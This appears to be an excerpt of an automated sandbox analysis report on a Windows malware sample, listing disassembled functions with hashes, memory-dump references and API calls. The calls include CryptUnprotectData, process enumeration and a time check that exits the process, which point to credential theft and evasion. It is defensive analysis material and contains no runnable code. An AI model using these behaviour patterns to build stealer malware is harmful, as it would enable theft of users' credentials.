                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ""k$6'w$Ao9$C,o+$U)7\$dAzw
                              • API String ID: 0-3349261393
                              • Opcode ID: 997fb2eb7c60b0d929ef784617f5c82b4d9d6d801e2c7b77037e6e3561114706
                              • Instruction ID: 061d40d71bb5eb5b50050b5d6ef8fc6661d776a83d415ab0e165ba3902eb76cc
                              • Opcode Fuzzy Hash: 997fb2eb7c60b0d929ef784617f5c82b4d9d6d801e2c7b77037e6e3561114706
                              • Instruction Fuzzy Hash: BBB219F360C204AFE704AE2DEC4567BBBE6EBD4720F168A3DE6C483744EA3558058657
                              Function 0058EEF1 Relevance: 7.9, Strings: 5, Instructions: 1644COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @>?$JgK$a(_$g9?Z$qgO
                              • API String ID: 0-161722662
                              • Opcode ID: e8769f8c1d2cc9718eb4c3bd0d3f5d27f25a1ba79938dad9f3ed0e2d35a945d9
                              • Instruction ID: 75b30384818c107f2b9ada0a91e1150da0d6de0589251d9d57d4ba045715928d
                              • Opcode Fuzzy Hash: e8769f8c1d2cc9718eb4c3bd0d3f5d27f25a1ba79938dad9f3ed0e2d35a945d9
                              • Instruction Fuzzy Hash: 1EB238F3A0C2149FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C7344E63598058697
                              Function 00582F8C Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $7EL$< }$J{MM$`6=$eo;
                              • API String ID: 0-485998035
                              • Opcode ID: 3572b2f4718245b5d7b8bfcce7e110ce983f98aaf4148377aa0e3778285b544f
                              • Instruction ID: 4f6f7e505ae25b916407e18a4f2e763de080f8ca6b40b16714289b67825181e6
                              • Opcode Fuzzy Hash: 3572b2f4718245b5d7b8bfcce7e110ce983f98aaf4148377aa0e3778285b544f
                              • Instruction Fuzzy Hash: ACB229F360C2049FE3086E2DEC85A7ABBE9EF94320F1A453DE6C5C7744EA3558058697
                              Function 0057C499 Relevance: 7.9, Strings: 5, Instructions: 1614COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0rf]$R35o$_7=$vIYA${?
                              • API String ID: 0-1634464998
                              • Opcode ID: 5d40d7d2bc2f66789b6dc5c4bf2e95f3a1c7212ba0475ec212699e546adf0157
                              • Instruction ID: 3045f3611cb71d92c027b20d7c53d75b5b60be9b52217090b022dc93697b42ff
                              • Opcode Fuzzy Hash: 5d40d7d2bc2f66789b6dc5c4bf2e95f3a1c7212ba0475ec212699e546adf0157
                              • Instruction Fuzzy Hash: 10B21AF360C2049FE304AE3DEC8567ABBE5EF94720F16893DEAC4C7744EA3558058696
                              Function 0058158E Relevance: 7.8, Strings: 5, Instructions: 1572COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: |?$?Pon$IJs$fj=_$4{[
                              • API String ID: 0-1885599475
                              • Opcode ID: ea09586ce0861abbfdacc98e87a048b033393d6e7f13b8439108f00b7f90efb5
                              • Instruction ID: dffdbf72b80790c076118b8f05e29c21bbdf9009d7039080055e1375b5068b99
                              • Opcode Fuzzy Hash: ea09586ce0861abbfdacc98e87a048b033393d6e7f13b8439108f00b7f90efb5
                              • Instruction Fuzzy Hash: A3B2D4F3A0C2049FE314AE29EC8567AFBE9EF94720F16493DE6C4C3740E67598058697
                              Function 0057E132 Relevance: 7.7, Strings: 5, Instructions: 1453COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !|rs$9e8_$:c}o$X;B$d<~
                              • API String ID: 0-2042879810
                              • Opcode ID: a478e5c53bb335b3ec5f6d28448d4fcf62d3ebd1d6569ce676b6cd090352a812
                              • Instruction ID: d255154075d61f787b4cd382142d61a76218bf5787569cf181ec1e29d2c1243d
                              • Opcode Fuzzy Hash: a478e5c53bb335b3ec5f6d28448d4fcf62d3ebd1d6569ce676b6cd090352a812
                              • Instruction Fuzzy Hash: EFA208F360C2049FE7046E2DEC8567AFBE9EF94720F1A4A3DEAC4C7344E63558058696
                              Function 001BC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001BC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001BC87C
                              • lstrcat.KERNEL32(?,001D0B46), ref: 001BC943
                              • lstrcat.KERNEL32(?,001D0B47), ref: 001BC957
                              • lstrcat.KERNEL32(?,001D0B4E), ref: 001BC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ac010033d6caeda5c1cbb43cd11db59e8aef849c8c351b2ec98d1429b70f97ba
                              • Instruction ID: cd857fe91165e15568e0652c8584304a22ecba84e16d4dde79fa14e2056795eb
                              • Opcode Fuzzy Hash: ac010033d6caeda5c1cbb43cd11db59e8aef849c8c351b2ec98d1429b70f97ba
                              • Instruction Fuzzy Hash: D4414DB590421ADFDB10DFA4DD89BFEF7B8BB48704F1041A9E509A7280D7749A84CF91
                              Function 001C6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 001C696C
                              • sscanf.NTDLL ref: 001C6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001C69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001C69C0
                              • ExitProcess.KERNEL32 ref: 001C69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 134a3518bc817f9f2d4aa504b9e3bc59c8622e530d9c5b02319e0c795c7162fc
                              • Instruction ID: b812fd8c81747799fe7c9b600cc7568acc4ff433eb86848873a8e7609ecd3086
                              • Opcode Fuzzy Hash: 134a3518bc817f9f2d4aa504b9e3bc59c8622e530d9c5b02319e0c795c7162fc
                              • Instruction Fuzzy Hash: 3A21BAB5D14208ABCF05EFE4D945AEEB7B9BF58304F04852EE40AA3250EB749605CBA5
                              Function 001B7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001B724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001B7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001B72A4
                              • LocalFree.KERNEL32(?), ref: 001B72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: e1e769a15aadaba6a9b9a4767911e328ad6e5fa514ebbeac1fbdb853a9659184
                              • Instruction ID: 3b6b35811efd84eace670a8baf884f451495fb751cdb78a748cdc08016e71023
                              • Opcode Fuzzy Hash: e1e769a15aadaba6a9b9a4767911e328ad6e5fa514ebbeac1fbdb853a9659184
                              • Instruction Fuzzy Hash: 030100B5A40208BBDB14DBE4CD45FAE77B8AB48704F104155FB09AB2C0D7B0AA00CB65
                              Function 001C9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C961E
                              • Process32First.KERNEL32(001D0ACA,00000128), ref: 001C9632
                              • Process32Next.KERNEL32(001D0ACA,00000128), ref: 001C9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 001C965C
                              • CloseHandle.KERNEL32(001D0ACA), ref: 001C967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 5103565078bd6413f4c14319edf8229fd6a3da103b56aed77949f5b8d51c47d1
                              • Instruction ID: 8d6b78ce59ba46708e171b0797572fd0aabeae1278cb7b89e353b22a95d8e324
                              • Opcode Fuzzy Hash: 5103565078bd6413f4c14319edf8229fd6a3da103b56aed77949f5b8d51c47d1
                              • Instruction Fuzzy Hash: 1201E9B5A00218ABCB15DFA5CD48FEDBBF8AB58740F104188A90996290E774AA44DF51
                              Function 005882E6 Relevance: 6.5, Strings: 4, Instructions: 1471COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,<o~$/N=$Me}=$6i{
                              • API String ID: 0-185543882
                              • Opcode ID: b49f31549480b60a8ffae5d267b04f5b20b3377b55a421055e7e6957b629285b
                              • Instruction ID: 48fa2f4bac4aab521d64d85e3faeaacbef44c27aba4eeaedfacd959656bc9b46
                              • Opcode Fuzzy Hash: b49f31549480b60a8ffae5d267b04f5b20b3377b55a421055e7e6957b629285b
                              • Instruction Fuzzy Hash: AEA204F390C2149FE7047E29EC8576ABBE5EF94320F1A4A3DEAC593744EA3558008797
                              Function 0057ACE6 Relevance: 6.3, Strings: 4, Instructions: 1308COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %Es$>Nm$J&V*$_'^
                              • API String ID: 0-3781541614
                              • Opcode ID: 0db91957582bc2e4d9e5a683aff70552c451b622ce75c3c12f78c4821559a316
                              • Instruction ID: 91899001cd5416d1f5c732de44bdab0f1a0d63ddb172b54ec5a0251feb7c792f
                              • Opcode Fuzzy Hash: 0db91957582bc2e4d9e5a683aff70552c451b622ce75c3c12f78c4821559a316
                              • Instruction Fuzzy Hash: 3F92D4F390C6149FE304AF29DC8566AFBE5EF94720F16892DEAC4C3744E63598018B97
                              Function 001C8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,001B5184,40000001,00000000,00000000,?,001B5184), ref: 001C8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
